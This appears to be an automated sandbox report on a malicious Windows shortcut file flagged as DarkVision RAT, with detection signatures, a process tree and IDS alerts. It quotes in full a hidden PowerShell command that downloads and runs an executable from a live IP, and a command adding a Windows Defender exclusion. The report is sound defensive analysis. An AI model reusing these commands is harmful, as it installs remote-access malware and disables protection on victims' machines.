Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
009274965.lnk

Overview

General Information

Sample name:009274965.lnk
Analysis ID:1582686
MD5:7f070dfbaa6893bb2effac0f2320a1d7
SHA1:293e7f6f6e70a0c7699215b3402dc5ff2bb2bfaa
SHA256:aeed70a3f936b699e93f18dfc5b4a582a6a08be7d52d8e6229754f96205aecb2
Tags:lnkuser-abuse_ch
Infos:

Detection

DarkVision Rat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected DarkVision Rat
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file contains section with special chars
Powershell drops PE file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to evade debugger and weak emulator (self modifying code)
Uses dynamic DNS services
Windows shortcut file (LNK) contains suspicious command line arguments
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to communicate with device drivers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 3920 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • file.exe (PID: 5620 cmdline: "C:\Users\user\AppData\Local\Temp\file.exe" MD5: D37285BF0331C7514E5E4CEC0FBE647C)
      • cmd.exe (PID: 3900 cmdline: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3404 cmdline: powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • windows.exe (PID: 5628 cmdline: "C:\ProgramData\windows\windows.exe" {05756468-6434-465A-9313-8CAA82F857B2} MD5: D37285BF0331C7514E5E4CEC0FBE647C)
        • cmd.exe (PID: 7296 cmdline: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7340 cmdline: powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • explorer.exe (PID: 7428 cmdline: "C:\Windows\explorer.exe" MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cmd.exe (PID: 7796 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\{43FE0128-8195-4F1C-ADAF-97085D2B6441}\{323467A8-45DA-47D5-AF53-60BD8A3D7BCB}.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7856 cmdline: cmd /c start "" "C:\ProgramData\windows\windows.exe" {E18E5DB7-AE08-4C9E-ABE2-E82E89BF186D} MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • windows.exe (PID: 7872 cmdline: "C:\ProgramData\windows\windows.exe" {E18E5DB7-AE08-4C9E-ABE2-E82E89BF186D} MD5: D37285BF0331C7514E5E4CEC0FBE647C)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\file.exeJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
    C:\Users\user\AppData\Local\Temp\file.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      C:\Users\user\AppData\Local\Temp\file.exeINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
      • 0x39748:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x39678:$s1: CoGetObject
      • 0x39710:$s2: Elevation:Administrator!new:
      C:\ProgramData\windows\windows.exeJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
        C:\ProgramData\windows\windows.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          Click to see the 1 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000007.00000002.2778094062.00007FF7EDBBA000.00000080.00000001.01000000.00000008.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
            00000003.00000003.1607358657.00000000045D6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
              00000003.00000003.1607358657.00000000045D6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                00000003.00000000.1604613620.00007FF7FE2C1000.00000080.00000001.01000000.00000007.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
                  00000003.00000000.1604613620.00007FF7FE2C1000.00000080.00000001.01000000.00000007.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    Click to see the 27 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    7.2.windows.exe.7ff7edb80000.0.unpackJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
                      7.2.windows.exe.7ff7edb80000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                        7.2.windows.exe.7ff7edb80000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                        • 0x38b48:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                        • 0x38a78:$s1: CoGetObject
                        • 0x38b10:$s2: Elevation:Administrator!new:
                        18.0.windows.exe.7ff7edb80000.0.unpackJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
                          18.0.windows.exe.7ff7edb80000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                            Click to see the 16 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows', CommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\file.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\file.exe, ParentProcessId: 5620, ParentProcessName: file.exe, ProcessCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows', ProcessId: 3900, ProcessName: cmd.exe
                            Sigma detected: Suspicious Invoke-WebRequest Execution
                            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 3920, ProcessName: powershell.exe
                            Sigma detected: Suspicious Script Execution From Temp Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 3920, ProcessName: powershell.exe
                            Sigma detected: PowerShell Web Download
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 3920, ProcessName: powershell.exe
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows', CommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\file.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\file.exe, ParentProcessId: 5620, ParentProcessName: file.exe, ProcessCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows', ProcessId: 3900, ProcessName: cmd.exe
                            Sigma detected: Startup Folder File Write
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\explorer.exe, ProcessId: 7428, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{5CAAC06D-2278-4820-8E02-FD7BF03ADE5D}.lnk
                            Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
                            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 3920, ProcessName: powershell.exe
                            Sigma detected: Usage Of Web Request Commands And Cmdlets
                            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 3920, ProcessName: powershell.exe
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 3920, ProcessName: powershell.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-31T09:28:40.039293+010020456181A Network Trojan was detected192.168.2.84971287.121.86.2143440TCP
                            2024-12-31T09:28:41.947167+010020456181A Network Trojan was detected192.168.2.84971387.121.86.2143440TCP
                            2024-12-31T09:28:42.824625+010020456181A Network Trojan was detected192.168.2.85925587.121.86.2143440TCP
                            2024-12-31T09:28:43.631999+010020456181A Network Trojan was detected192.168.2.85925687.121.86.2143440TCP
                            2024-12-31T09:28:44.432792+010020456181A Network Trojan was detected192.168.2.85925787.121.86.2143440TCP
                            2024-12-31T09:28:45.213759+010020456181A Network Trojan was detected192.168.2.85925887.121.86.2143440TCP
                            2024-12-31T09:29:32.455077+010020456181A Network Trojan was detected192.168.2.85935787.121.86.2143440TCP
                            2024-12-31T09:29:33.981907+010020456181A Network Trojan was detected192.168.2.85936887.121.86.2143440TCP
                            2024-12-31T09:29:34.769417+010020456181A Network Trojan was detected192.168.2.85937487.121.86.2143440TCP
                            2024-12-31T09:29:35.560094+010020456181A Network Trojan was detected192.168.2.85938087.121.86.2143440TCP
                            2024-12-31T09:29:36.386881+010020456181A Network Trojan was detected192.168.2.85938687.121.86.2143440TCP
                            2024-12-31T09:29:37.179091+010020456181A Network Trojan was detected192.168.2.85939287.121.86.2143440TCP
                            2024-12-31T09:30:18.491262+010020456181A Network Trojan was detected192.168.2.85962987.121.86.2143440TCP
                            2024-12-31T09:30:20.012548+010020456181A Network Trojan was detected192.168.2.85963087.121.86.2143440TCP
                            2024-12-31T09:30:20.807189+010020456181A Network Trojan was detected192.168.2.85963187.121.86.2143440TCP
                            2024-12-31T09:30:21.665428+010020456181A Network Trojan was detected192.168.2.85963287.121.86.2143440TCP
                            2024-12-31T09:30:22.466740+010020456181A Network Trojan was detected192.168.2.85963387.121.86.2143440TCP
                            2024-12-31T09:30:23.241641+010020456181A Network Trojan was detected192.168.2.85963487.121.86.2143440TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-31T09:28:41.314009+010020456191A Network Trojan was detected192.168.2.84971287.121.86.2143440TCP
                            2024-12-31T09:29:33.524717+010020456191A Network Trojan was detected192.168.2.85935787.121.86.2143440TCP
                            2024-12-31T09:30:19.569619+010020456191A Network Trojan was detected192.168.2.85962987.121.86.2143440TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-31T09:28:24.646706+010018100032Potentially Bad Traffic87.120.113.9180192.168.2.849708TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-31T09:28:24.646692+010018100001Potentially Bad Traffic192.168.2.84970887.120.113.9180TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: http://87.120.113.91/image.exeAvira URL Cloud: Label: malware
                            Multi AV Scanner detection for dropped file
                            Source: C:\ProgramData\windows\windows.exeReversingLabs: Detection: 73%
                            Source: C:\Users\user\AppData\Local\Temp\file.exeReversingLabs: Detection: 73%
                            Multi AV Scanner detection for submitted file
                            Source: 009274965.lnkReversingLabs: Detection: 28%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\file.exeJoe Sandbox ML: detected
                            Source: C:\ProgramData\windows\windows.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: 009274965.lnkJoe Sandbox ML: detected

                            Exploits

                            barindex
                            Yara detected UAC Bypass using CMSTP
                            Source: Yara matchFile source: 7.2.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.0.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.file.exe.7ff7fe2c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.0.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.explorer.exe.29c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.0.file.exe.7ff7fe2c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000003.00000003.1607358657.00000000045D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.1604613620.00007FF7FE2C1000.00000080.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.1669864142.0000000004927000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000000.1801050989.00007FF7EDB81000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2778070718.00007FF7EDBB9000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000000.1613068300.00007FF7EDB81000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.1652189758.000000000492A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.1829520481.00007FF7EDBB9000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1611903304.00000000045D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.1637478663.00007FF7FE2F9000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.1650179614.000000000492B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: file.exe PID: 5620, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: windows.exe PID: 5628, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7428, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: windows.exe PID: 7872, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\file.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\windows\windows.exe, type: DROPPED
                            Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: file.exe, 00000003.00000002.1638588630.00007FF7FE611000.00000040.00000001.01000000.00000007.sdmp, windows.exe, 00000007.00000002.2778931086.00007FF7EDED1000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmp, windows.exe, 00000012.00000002.1830258271.00007FF7EDED1000.00000040.00000001.01000000.00000008.sdmp
                            Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: file.exe, file.exe, 00000003.00000002.1638588630.00007FF7FE611000.00000040.00000001.01000000.00000007.sdmp, windows.exe, windows.exe, 00000007.00000002.2778931086.00007FF7EDED1000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, explorer.exe, 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmp, windows.exe, 00000012.00000002.1830258271.00007FF7EDED1000.00000040.00000001.01000000.00000008.sdmp
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49708 -> 87.120.113.91:80
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.8:49713 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.8:59255 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.8:59257 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.8:49712 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.8:59258 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.8:59256 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.8:49712 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.8:59357 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.8:59357 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.8:59368 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.8:59374 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.8:59386 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.8:59380 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.8:59392 -> 87.121.86.214:3440
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.8:59632 -> 87.121.86.214:3440
